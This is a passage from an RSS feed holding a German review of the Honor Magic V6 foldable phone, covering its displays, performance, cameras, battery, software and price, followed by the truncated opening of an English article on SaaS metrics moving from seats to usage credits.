<p class="wp-block-paragraph">Es ist zudem besonders robust konstruiert, mit kratzfestem „NanoCrystal Shield“-Glas auf der Vorderseite und einem „Super Steel“-Scharnier, das die Stoßfestigkeit verbessert.</p>



<p class="wp-block-paragraph">SGS-Zertifizierungen untermauern diese Angaben ebenfalls, da das Smartphone für seine Fallfestigkeit mit 5 Sternen ausgezeichnet wurde. Ich habe mein Testgerät nicht allzu grob behandelt, aber es ist beruhigend zu wissen, dass es unversehrt bleiben dürfte, sollte mir einmal ein Ausrutscher unterlaufen.</p>



<h2 class="wp-block-heading">Bildschirm &amp; Lautsprecher</h2>



<ul class="wp-block-list">
<li>Außen: 6,52 Zoll, 1.080 x 2.420, OLED, 120 Hertz</li>



<li>Innen: 7,95 Zoll, 2.172 × 2.352, OLED, 120 Hertz</li>



<li>Stereolautsprecher</li>
</ul>



<p class="wp-block-paragraph">Bei Falt-Smartphones dreht sich alles um den Bildschirm. Beginnen wir also mit dem Star der Show: dem inneren Display. Mit einer Diagonale von knapp unter 8 Zoll gehört es zu den größten Falt-Smartphones im Buchformat auf dem Markt.</p>



<p class="wp-block-paragraph">Es ist nahezu perfekt quadratisch, was sich hervorragend für die parallele Nutzung zweier Apps eignet.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.39.png?w=1024" alt="Honor Magic V6" class="wp-image-4199608" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Dieses flexible Display verfügt über eine Bildwiederholfrequenz von 120 Hertz und erreicht eine beeindruckende Spitzenhelligkeit von 5.000 Nits. Solche Helligkeitsangaben sollten Sie zwar stets mit einer gehörigen Portion Skepsis betrachten, doch unabhängig davon handelt es sich um ein sehr helles Display, das auch im Freien gut ablesbar ist.</p>



<p class="wp-block-paragraph">Der innere Bildschirm ist mit einer glänzenden Schutzfolie versehen (wenn auch mit einer Antireflexbeschichtung), was sowohl Vor- als auch Nachteile mit sich bringt. Wie ich bereits in anderen Testberichten zu Falt-Smartphones erwähnt habe, kaschieren mattierte Schutzfolien die Falz zwar besser, ziehen aber auch Fingerabdrücke an. Diese hier verschmiert nicht so leicht, doch trotz aller Bemühungen von Honor treten entlang der Falz einige unerwünschte Reflexionen auf.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.44.png?w=1024" alt="Honor Magic V6" class="wp-image-4199609" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Apropos: Die Falz ist bewundernswert flach, und noch vor nicht allzu langer Zeit wäre sie die beste gewesen, die mir je begegnet wäre. Allerdings nutze ich das Oppo Find N6 seit seiner Markteinführung fast täglich, und leider kann dieses Modell da nicht ganz mithalten.</p>



<p class="wp-block-paragraph">Es ist dennoch äußerst beeindruckend und um Längen besser als das <a href="https://www.pcwelt.de/article/2945312/google-pixel-10-pro-test-3.html" target="_blank">Pixel 10 Pro Fold</a>. Auch im Vergleich zum Galaxy Z Fold 7 fällt die Falz etwas weniger auf.</p>



<p class="wp-block-paragraph">Was das Außendisplay betrifft, so ist es fast nicht von dem Bildschirm eines Flaggschiff-Handys im Barren-Format zu unterscheiden, abgesehen davon, dass es ganz leicht schmaler ist als üblich. Es verfügt über schöne, schmale Einfassungen an allen Seiten, eine flinke Bildwiederholfrequenz von 120 Hertz und eine noch höhere Spitzenhelligkeit von 6.000 Nits.</p>



<p class="wp-block-paragraph">Wie bereits bei den letzten Generationen der faltbaren Honor-Modelle gibt es keine nennenswerten Nachteile bei der Nutzung des zusammengeklappten Telefons; es fühlt sich einfach wie ein normales Smartphone an. Wenn Sie dann einen größeren Bildschirm für Ihre Inhalte, Spiele oder Multitasking benötigen, klappen Sie es einfach auf.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.47.png?w=1024" alt="Honor Magic V6" class="wp-image-4199611" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Wie üblich hat Honor einiges in Funktionen zum Augenschutz investiert, und beide Bildschirme unterstützen eine PWM-Dimmung mit 4.320 Hertz. Das werden Sie besonders zu schätzen wissen, wenn Sie empfindlich auf Flackern reagieren. Beide Bildschirme unterstützen zudem die Eingabe per Stylus, allerdings hatte ich leider keinen Honor-Stylus zur Hand, um dies auszuprobieren.</p>



<p class="wp-block-paragraph">Die luxuriösen Displays werden durch ein ordentliches Lautsprecherset ergänzt. Das Stereopaar erzeugt eine schöne, breite Klangbühne, kann mehr als laut genug werden und bietet eine ordentliche Basswiedergabe. Sie können zwar nicht mit den bassbetonten Lautsprechern des <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank">Magic 8 Pro</a> mithalten, aber bei einem so schlanken Gehäuse sind die Möglichkeiten nun einmal begrenzt.</p>



<h2 class="wp-block-heading">Technische Daten &amp; Leistung</h2>



<ul class="wp-block-list">
<li>Qualcomm Snapdragon 8 Elite Gen 5</li>



<li>16 GB RAM</li>



<li>512 GB Speicher</li>
</ul>



<p class="wp-block-paragraph">Das Magic V6 verfügt über den leistungsstärksten Chip von Qualcomm, den Snapdragon 8 Elite Gen 5, und das globale Modell ist mit 16 GB RAM und 512 GB Speicher ausgestattet. Bei einem so schlanken Falt-Smartphone stellt die Wärmeableitung stets eine Herausforderung dar, doch Honor hat hier eine großzügig dimensionierte Vapor-Chamber verbaut, um eine optimale Leistung zu gewährleisten.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.51.png?w=1024" alt="Honor Magic V6" class="wp-image-4199612" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Das V6 hat meine täglichen Leistungsanforderungen problemlos erfüllt. Bei einem Falt-Smartphone habe ich oft drei Apps gleichzeitig geöffnet, wechsle zwischen ihnen hin und her und spiele häufig gleichzeitig Musik ab oder streame Videos. Selbst dann kam das Smartphone kaum ins Schwitzen.</p>



<p class="wp-block-paragraph">Man muss schon ein ziemlich anspruchsvolles Spiel starten, um dieses Smartphone ein wenig ins Schwitzen zu bringen, und wie es der Zufall so will, bin ich ziemlich süchtig nach <em>NTE: Neverness to Everness</em> (ein Open-World-Spiel mit atemberaubender Grafik und einer riesigen Stadtkarte, mit deren Darstellung die meisten Smartphones zu kämpfen haben). Doch das Magic V6 hatte damit kaum Probleme.</p>



<p class="wp-block-paragraph">Das Spiel lief bei der Grafikvoreinstellung „Extreme“ flüssig mit 60 FPS, und obwohl es sich ziemlich stark erwärmte – insbesondere im Bereich der Kamera –, schien die Leistung darunter nicht zu leiden. Die beste Erfahrung machte ich mit einem GameSir-Clamp-Controller, der die Wärme von meinen Handflächen fernhielt.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.55.png?w=1024" alt="Honor Magic V6" class="wp-image-4199613" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<h2 class="wp-block-heading">Honor Magic V6 – Benchmark-Ergebnisse</h2>



<p class="wp-block-paragraph">Was die Benchmark-Ergebnisse angeht, wird es recht interessant. Während die meisten Ergebnisse hervorragend waren, hatte das Smartphone erhebliche Schwierigkeiten, den 3DMark Wildlife Extreme Stress Test abzuschließen. Normalerweise führe ich diesen Test bei aufgeklapptem Smartphone durch, doch es überhitzte sich und brach den Benchmark jedes Mal ab, wenn ich es versuchte.</p>



<p class="wp-block-paragraph">Zugegebenermaßen war es in letzter Zeit recht warm, doch so etwas ist mir bisher noch nie passiert. Bei der Durchführung des Tests auf dem Cover-Display konnte es den Test mit einem ordentlichen Ergebnis abschließen, auf dem klappbaren Bildschirm war dies jedoch nicht möglich. Im alltäglichen Gebrauch hatte ich jedoch nie derartige Probleme.</p>



<div class="infogram-embed" data-id="c07985c1-d0b5-46f6-bd84-2898abc5f4fa" data-type="interactive" data-title="Honor Magic V6 benchmarks"></div>




<h2 class="wp-block-heading">Kameras</h2>



<ul class="wp-block-list">
<li>50-MP-Hauptkamera mit f/1,6</li>



<li>64 MP, f/2,5, 3-fach-Tele</li>



<li>50 MP, f/2,2 Ultraweitwinkel</li>



<li>20 MP, f/2,2 Selfie-Kamera</li>
</ul>



<p class="wp-block-paragraph">Das Honor Magic V6 verfügt über dieselbe Kamera-Hardware wie die Vorgängergeneration, was bedeutet, dass es keine nennenswerten Neuerungen gibt.</p>



<p class="wp-block-paragraph">Allerdings verfügte das V5 bereits über eine der beeindruckendsten Kameraausstattungen unter allen faltbaren Smartphones, und die Konkurrenz hat sich in dieser Hinsicht nicht sonderlich ins Zeug gelegt – daher gehört es nach wie vor zu den Besten.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.14.59.png?w=1024" alt="Honor Magic V6" class="wp-image-4199614" width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Auf der Rückseite befindet sich eine 50-MP-Hauptkamera mit einem Sensor von ansehnlicher Größe (1/1,56 Zoll) und einem lichtstarken f/1,6-Objektiv. Hinzu kommen eine 50-MP-Ultraweitwinkelkamera mit einem extrem weiten Sichtfeld (entspricht 13 mm) sowie ein ausgezeichnetes 64-MP-Teleobjektiv. Außerdem gibt es zwei 20-MP-Selfie-Kameras, von denen jeweils eine durch das jeweilige Display ragt.</p>



<p class="wp-block-paragraph">Dies ist eine äußerst vielseitige Objektivausstattung, mit der Sie alles aufnehmen können – von weitläufigen Landschaften bis zu intimen Porträts. Wie üblich hat mir die Verwendung des Teleobjektivs am meisten Spaß gemacht, und dies könnte die beste Tele-Kamera sein, die jemals in einem faltbaren Smartphone verbaut wurde.</p>



<p class="wp-block-paragraph">Es verfügt über einen recht großen 1/2-Zoll-Sensor und kann aus sehr kurzer Entfernung fokussieren. Ihr Motiv muss sich lediglich etwa 20 Zentimeter vom Objektiv entfernt befinden, und in Kombination mit der Brennweite von 70 mm (äquivalent) entsteht so eine schöne perspektivische Kompression und ein natürliches Bokeh.</p>



<p class="wp-block-paragraph">Natürlich können Sie mit einem digitalen Ausschnitt noch weiter zoomen, und die Kamera-App ermöglicht Ihnen auf Wunsch eine bis zu 100-fache Vergrößerung. Bei einer Vergrößerung von mehr als 10-fach können Sie generative KI nutzen, um die Bilder zu bereinigen, doch auch ohne diese Funktion erhalten Sie bereits bei etwa 20-facher Vergrößerung brauchbare Bilder.</p>



<p class="wp-block-paragraph">Ich habe bereits erwähnt, wie weitwinklig das Ultraweitwinkelobjektiv ist, und das gefällt mir besonders gut daran; ansonsten ist es jedoch im Vergleich zu den anderen Objektiven definitiv ein Qualitätsverlust.</p>



<p class="wp-block-paragraph">Nachts ist es zudem am wenigsten überzeugend, da Bewegungsunschärfe dort nur schwer zu bewältigen ist. Bei den richtigen Lichtverhältnissen ist es jedoch zu wirklich beeindruckenden Aufnahmen fähig.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.15.23.png?w=1024" alt="Honor Magic V6" class="wp-image-4199618" width="1024" height="918" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Die Hauptkamera ist wie immer die zuverlässigste des Trios. Dank des größeren Sensors schneidet sie bei schlechten Lichtverhältnissen am besten ab und liefert tagsüber etwas schärfere Bilder als die anderen Kameras.</p>



<p class="wp-block-paragraph">Die Selfie-Kameras sind nichts Besonderes. Sie erfüllen ihren Zweck und eignen sich für Zoom-Anrufe, doch wenn man auf der Rückseite so beeindruckende Kameras hat, lohnt es sich wirklich, das Smartphone umzudrehen und den Bildschirm auf der Rückseite zu nutzen, um wirklich beeindruckende Fotos zu machen.</p>



<p class="wp-block-paragraph">Die Bildverarbeitung von Honor kann etwas unbeständig sein, aber ich habe den Eindruck, dass sie immer konsistenter wird, und wenn sie funktioniert, lassen sich wirklich atemberaubende Bilder erzielen.</p>



<p class="wp-block-paragraph">Mein größter Kritikpunkt ist die Bewegungsunschärfe im Porträtmodus. Ich bin mir nicht sicher, woran es liegt, aber ich erhalte viele unscharfe Aufnahmen, wenn die künstliche Hintergrundunschärfe aktiviert ist – selbst bei guten Lichtverhältnissen.</p>



<p class="wp-block-paragraph">Ansonsten bin ich mit den Bildern, die ich mit dem Magic V6 aufgenommen habe, sehr zufrieden. Die Harcourt-Porträtmodi sind so beeindruckend wie eh und je, und mit den übrigen Filtern lässt sich der Look Ihrer Fotos ziemlich drastisch verändern. Besonders gut gefällt mir der Filter „Nostalgic Negative“, der einen schönen, kontrastreichen Cross-Entwicklungs-Look mit blauen Schatten erzeugt.</p>



<p class="wp-block-paragraph">Was die Videoaufnahmen angeht, ist das Angebot etwas weniger umfangreich. Das soll nicht heißen, dass es schlecht ist, aber nachdem ich viel Zeit mit dem Oppo Find N6 verbracht habe, habe ich mich an ein ordentliches Log-Profil, 4K-120-Aufnahmen und Dolby Vision gewöhnt. Nichts davon ist hier vorhanden. Es gibt zwar ein Log-Profil, dieses funktioniert jedoch nur mit dem Hauptsensor und erzeugt ungewöhnlich körnige Schatten.</p>



<p class="wp-block-paragraph">Wenn Sie jedoch keine ganz so professionellen Ansprüche haben, werden Sie mit der Videoleistung wahrscheinlich sehr zufrieden sein. Sie können mit jeder Kamera bis zu 4K bei 60 FPS aufnehmen, mit Ausnahme der Selfie-Kamera, die maximal 4K bei 30 FPS erreicht. Die Bildstabilisierung ist gut, und auch die Mikrofone sind ordentlich.</p>



<h2 class="wp-block-heading">Akkulaufzeit &amp; Aufladen</h2>



<ul class="wp-block-list">
<li>6.660-mAh-Akku</li>



<li>80-Watt-Laden über Kabel</li>



<li>66 Watt kabelloses Laden</li>
</ul>



<p class="wp-block-paragraph">Das Honor Magic V6 verfügt über den größten Akku aller faltbaren Smartphones, die ich bisher getestet habe. Irgendwie ist es Honor gelungen, einen 6660-mAh-Akku in dieses hauchdünne Gehäuse zu integrieren. Samsun wird hoffentlich davon lernen.</p>



<p class="wp-block-paragraph">Diese Kapazität verblasst zwar im Vergleich zur chinesischen 1-TB-Version dieses Smartphones, die über einen erstaunlichen 7.150-mAh-Akku verfügt, doch wie wir in letzter Zeit oft gesehen haben, bedeuten die EU-Vorschriften, dass wir im Westen keinen ganz so massiven Akku erhalten können.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.15.38.png?w=1024" alt="Honor Magic V6" class="wp-image-4199619" width="1024" height="574" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Das spielt jedoch keine allzu große Rolle, denn dieser Akku ist mehr als gut genug. Obwohl ich den großen internen Bildschirm häufig nutzte und unzählige Fotos machte, reichte die Akkulaufzeit dieses Smartphones während des Großteils meiner Tests für eineinhalb Tage. Natürlich verkürzt intensives Gaming die Laufzeit etwas, aber Sie werden das Gerät selten, wenn überhaupt, vor dem Schlafengehen aufladen müssen.</p>



<p class="wp-block-paragraph">Auch das Aufladen erfolgt schnell, vorausgesetzt, Sie verfügen über ein ausreichend leistungsstarkes Netzteil (im Lieferumfang ist lediglich ein USB-C-Kabel enthalten), um die 80-Watt-Geschwindigkeit nutzen zu können. Ich konnte das Gerät in nur einer halben Stunde von leer auf fast 70 Prozent aufladen; mehr kann man sich kaum wünschen.</p>



<p class="wp-block-paragraph">Wenn Sie kabelloses Laden bevorzugen, ist dies ohne nennenswerte Einbußen bei der Geschwindigkeit möglich. Das Honor Magic V6 lässt sich mit einem offiziellen kabellosen Ladepad von Honor mit bis zu 66 Watt aufladen.</p>



<h2 class="wp-block-heading">Software &amp; Apps</h2>



<ul class="wp-block-list">
<li>MagicOS 10, basierend auf Android 16</li>



<li>Zahlreiche KI-Funktionen</li>



<li>Kompatibilität mit dem Apple-Ökosystem</li>
</ul>



<p class="wp-block-paragraph">Auf dem Magic V6 läuft MagicOS 10, Honors eigene Variante von <a href="https://www.pcwelt.de/article/2781437/android-16-release-design-funktionen-kompatible-geraete.html" target="_blank">Android 16</a>. Es handelt sich im Wesentlichen um dieselbe Software, die wir bereits von den letzten Honor-Flaggschiffmodellen kennen. Wenn Sie also bereits eines dieser Modelle ausprobiert haben, werden Sie kaum Überraschungen erleben.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.15.46.png?w=1024" alt="Honor Magic V6" class="wp-image-4199620" width="1024" height="574" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Die Software von Honor kann die Meinungen spalten. Sie weicht ziemlich stark vom typischen Android-Erlebnis ab; stattdessen erinnert sie zunehmend an iOS. Ob das nun gut ist oder nicht, hängt ganz von Ihren Vorlieben ab.</p>



<p class="wp-block-paragraph">Allerdings lässt sich die Benutzeroberfläche extrem gut anpassen – wenn Ihnen also das Design oder das Layout einer Funktion nicht gefällt, können Sie es höchstwahrscheinlich ändern.</p>



<p class="wp-block-paragraph">Insgesamt gefällt sie mir recht gut. Sie wirkt schnell und reaktionsfreudig, sieht standardmäßig ansprechend aus und bietet zahlreiche Werkzeuge zur weiteren Anpassung. Wie bereits erwähnt, gibt es zahlreiche Anlehnungen an iOS, darunter einige „Liquid Glass“-ähnliche Elemente, einen „Dynamic Island“-Klon, geteilte Benachrichtigungen/Schnelleinstellungen sowie die Möglichkeit, die App-Übersicht zu deaktivieren.</p>



<p class="wp-block-paragraph">Das sind zwar nicht die originellsten Entscheidungen, aber sie funktionieren gut, und die meisten sind vollkommen optional.</p>



<p class="wp-block-paragraph">Honor bietet Ihnen eine Vielzahl von KI-Funktionen, darunter die üblichen Tools für Transkription, Übersetzung und Zusammenfassung sowie einige sehr fortschrittliche Funktionen zur Fotobearbeitung.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.15.53.png?w=1024" alt="Honor Magic V6" class="wp-image-4199623" width="1024" height="574" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Auch das Multitasking ist hervorragend. Sie können Apps im Split-View nebeneinander anzeigen und dann eine dritte hinzufügen, die nur am Rand des Bildschirms hervorblitzt und bei Bedarf sofort einsatzbereit ist. Oder, wenn Sie es vorziehen, können Sie schwebende Fenster nutzen und so noch mehr Inhalte gleichzeitig auf dem Bildschirm anzeigen.</p>



<p class="wp-block-paragraph">Am spannendsten finde ich jedoch die Art und Weise, wie sich das Magic V6 in Apple-Produkte integrieren lässt. Insbesondere, wie gut es mit meinem Macbook zusammenarbeitet. Wenn Sie die Honor Workstation-App aus dem Mac App Store installieren, können Sie Dateien austauschen, zwischen Geräten kopieren und einfügen, Ihr Smartphone fernsteuern und das V6 sogar als drahtlosen zweiten Bildschirm nutzen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.15.58.png?w=1024" alt="Honor Magic V6" class="wp-image-4199625" width="1024" height="574" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph">Doch damit ist der Spaß noch lange nicht vorbei. Das Honor Magic V6 kann auch nativ Dateien in Ihrem iCloud-Konto durchsuchen und verwalten, und mit Honor Connect können Sie Dateien auch per AirDrop zu und von iPhones übertragen. Das ist großartig, wenn Sie ständig zwischen verschiedenen Ökosystemen hin- und herwechseln (wie ich es oft tue).</p>



<p class="wp-block-paragraph">Insgesamt ist es also ein solides Software-Erlebnis, das jedoch nicht ganz ohne Nachteile ist. Meine größte Kritik an Honor-Smartphones ist seit einigen Jahren unberücksichtigt geblieben. Das Akkumanagement ist extrem aggressiv und beendet standardmäßig Hintergrund-Apps mit rücksichtsloser Härte.</p>



<p class="wp-block-paragraph">Das bedeutet, dass Sie häufig unter stark verzögerten Benachrichtigungen leiden, bis Sie einige Einstellungen anpassen und sicherstellen, dass diese Apps geöffnet bleiben.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-22.16.03.png?w=1024" alt="Honor Magic V6" class="wp-image-4199626" width="1024" height="574" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Luke Baker</p></div>



<p class="wp-block-paragraph"><br><br>Das lässt sich zwar leicht beheben, und ich kann die Logik dahinter nachvollziehen – schließlich bieten Honor-Smartphones stets eine hervorragende Akkulaufzeit –, doch es ist äußerst ärgerlich, und ich würde mich sehr freuen, wenn dieses Problem behoben würde.</p>



<p class="wp-block-paragraph">Honor verspricht sieben Jahre lang Software-Updates und Sicherheitspatches für seine Flaggschiff-Geräte und liegt damit auf einer Stufe mit Samsung und Apple. Viel besser geht es kaum, auch wenn Sie möglicherweise eine Weile auf das auf <a href="https://www.pcwelt.de/article/2990238/android-17-release-features-update-2.html" target="_blank">Android 17</a> basierende MagicOS 11 warten müssen.</p>



<h2 class="wp-block-heading">Preis &amp; Verfügbarkeit</h2>



<p class="wp-block-paragraph">Das Honor Magic V6 kann ab sofort in Deutschland und den meisten anderen Ländern der Welt bestellt werden, wobei die USA wie üblich ausgeschlossen sind. Hierzulande liegt der Preis bei stolzen <a href="https://www.pcwelt.de/article/3183215/honor-magic-v6-test-review.html#" target="_blank">2.299 Euro</a>, wobei es bis zum 31. Juli noch einen Rabatt von 600 Euro gibt (Endpreis: 1.699,90 Euro).</p>



<p class="wp-block-paragraph">Als besonderes Einführungsangebot legt Honor auch eine Reihe kostenloser Extras wie ein Tablet, einen Stift und ein Set Earbuds bei. Das macht eine Beurteilung des Preises ziemlich schwierig. Auf dem Papier ist das Magic V6 deutlich teurer als das V5, das im vergangenen Jahr für 1.999 Euro auf den Markt kam. Und das schmerzt, insbesondere wenn man bedenkt, dass es seinem Vorgänger so ähnlich ist. Mit dem Rabatt ist es jedoch günstiger.</p>



<p class="wp-block-paragraph">Preislich bewegt es sich trotzdem noch in einem ähnlichen Rahmen wie viele andere Falt-Smartphones, die wir getestet haben. Darunter das <a href="https://www.pcwelt.de/article/3168239/motorola-razr-fold-test.html" target="_blank">Motorola Razr Fold</a>, <a href="https://www.pcwelt.de/article/2843601/samsung-galaxy-z-fold-7-test.html" target="_blank">das Samsung Galaxy Z Fold 7</a> und <a href="https://www.pcwelt.de/article/2945312/google-pixel-10-pro-test-3.html" target="_blank">das Google Pixel 10 Pro Fold</a>.</p>



<h2 class="wp-block-heading">Sollten Sie das Honor Magic V6 kaufen?</h2>



<p class="wp-block-paragraph">Das Magic V6 ist zweifellos eines der attraktivsten faltbaren Smartphones, die derzeit auf dem Markt erhältlich sind. Die Hardware ist hervorragend, die Bildschirme sind beeindruckend, es ist leistungsstark und die Kameras sind erstklassig. Wenn Sie ein faltbares Smartphone mit großem Bildschirm suchen, aber bei den Kameras keine allzu großen Abstriche machen möchten, ist dies eine hervorragende Wahl.</p>



<p class="wp-block-paragraph">Allerdings könnten versierte Käufer sich für das <a href="https://www.pcwelt.de/article/2838914/honor-magic-v5-test.html" target="_blank">Vorjahresmodell</a> entscheiden und für deutlich weniger Geld ein sehr ähnliches Gesamterlebnis erhalten. Es ist nach wie vor extrem leistungsstark und verfügt über dieselben Kameras. Es wird jedoch nicht ewig vorrätig sein.</p>



<p class="wp-block-paragraph">Man sollte auch bedenken, dass das Galaxy Z Fold 8 und das Z Fold 8 Ultra voraussichtlich im Juli 2026 erscheinen werden, während Apples lang erwartetes faltbares iPhone wahrscheinlich im September vorgestellt wird. Ich persönlich würde mir daher erst einmal ansehen, was diese Modelle zu bieten haben, bevor ich den Sprung wage.</p>



<p class="wp-block-paragraph">Wenn Sie nicht warten können, ist das Honor Magic V6 eine hervorragende Wahl und wird dies wahrscheinlich auch bleiben. Ich kann mir nicht vorstellen, dass Samsung die Akkukapazität übertreffen wird, und ich bezweifle sehr, dass es in puncto Kameraleistung übertroffen wird. Abgesehen von ein paar kleinen Software-Mängeln ist es ein brillantes Smartphone.</p>



<h2 class="wp-block-heading">Technische Daten</h2>



<ul class="wp-block-list">
<li>MagicOS 10, basierend auf Android 16</li>



<li>Außen: 6,52 Zoll, 1.080 x 2.420, OLED, 120 Hz</li>



<li>Innen: 7,95 Zoll, 2172 × 2352, OLED, 120 Hz</li>



<li>Fingerabdrucksensor im Ein-/Aus-Schalter</li>



<li>Qualcomm Snapdragon 8 Elite Gen 5</li>



<li>16 GB RAM</li>



<li>512 GB Speicher</li>



<li>Kamera:</li>



<li>50 MP, f/1,6 Hauptkamera</li>



<li>64 MP, f/2,5, 3-fach-Teleobjektiv</li>



<li>50 MP, f/2,2 Ultraweitwinkel</li>



<li>Doppelte 20-MP-Selfie-Kamera mit f/2,2</li>



<li>Videoaufnahmen mit bis zu 4K bei 60 fps (Rückkamera)</li>



<li>Stereolautsprecher</li>



<li>Dual-SIM</li>



<li>WLAN 802.11 a/b/g/n/ac/6e/7</li>



<li>Bluetooth 6.0</li>



<li>6660-mAh-Akku</li>



<li>80-W-Laden über Kabel</li>



<li>66 W kabelloses Laden</li>



<li>156,7 × 74,5 × 8,8 mm (zusammengeklappt)</li>



<li>IP69-zertifiziert</li>



<li>219 g</li>



<li>Farben: Gold, Rot, Weiß, Schwarz</li>
</ul>



<p class="wp-block-paragraph">(<a href="https://www.pcwelt.de/article/3183215/honor-magic-v6-test-review.html" data-type="link" data-id="https://www.pcwelt.de/article/3183215/honor-magic-v6-test-review.html" target="_blank">PC-Welt</a>)</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The new value architecture of the AI-native SaaS era]]></title>
<description><![CDATA[The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.



In brief:




AI is transforming software as a service (SaaS), and the old ways of keeping score no longer apply.



Smart companies are evolving new metrics that provide deep...]]></description>
<link>https://tsecurity.de/de/3694395/it-security-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694395/it-security-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.</p>



<p class="wp-block-paragraph">In brief:</p>



<ul class="wp-block-list">
<li><a href="https://www.cio.com/article/4146669/is-ai-the-end-of-saas-as-we-know-it.html">AI is transforming software as a service (SaaS)</a>, and the old ways of keeping score no longer apply.</li>



<li>Smart companies are evolving new metrics that provide deeper insight into how AI-native software is performing in a new marketplace.</li>



<li>These changes impact everything from pricing to valuations.</li>
</ul>



<p class="wp-block-paragraph">The transformation of the software-as-a-service (SaaS) industry toward AI-native operating companies is rapidly changing the unit of value across the industry.</p>



<p class="wp-block-paragraph">The traditional metric of seats — which measured access — is rapidly giving way to credits designed to measure work performed. This evolution is upending the industry in multiple ways, impacting everything from pricing to enterprise valuations.</p>



<p class="wp-block-paragraph">While many companies still cling to seat-based metrics to measure growth, efficiency and durability, the future is likely to be one in which companies utilize a <a href="https://www.cio.com/article/4184688/it-hurtles-toward-the-great-enterprise-pricing-reset.html">credit-centric metrics framework</a>, with seats and outcomes as the bookends of a spectrum.</p>



<h2 class="wp-block-heading">Why do software companies need new metrics?</h2>



<p class="wp-block-paragraph">Why the rethink, and why now? There are five major forces that are driving this shift:</p>



<ol start="1" class="wp-block-list">
<li><a href="https://www.idc.com/resource-center/blog/is-saas-dead-rethinking-the-future-of-software-in-the-age-of-ai/"><strong>The unit of value is changing</strong></a><strong>.</strong> Seats measured who could access software, and credits measure what the software actually does. But in an AI-native world, agents don’t have seats; they have workloads. Over the past 18 months, every major SaaS platform has moved to some forms of credit or consumption unit.</li>



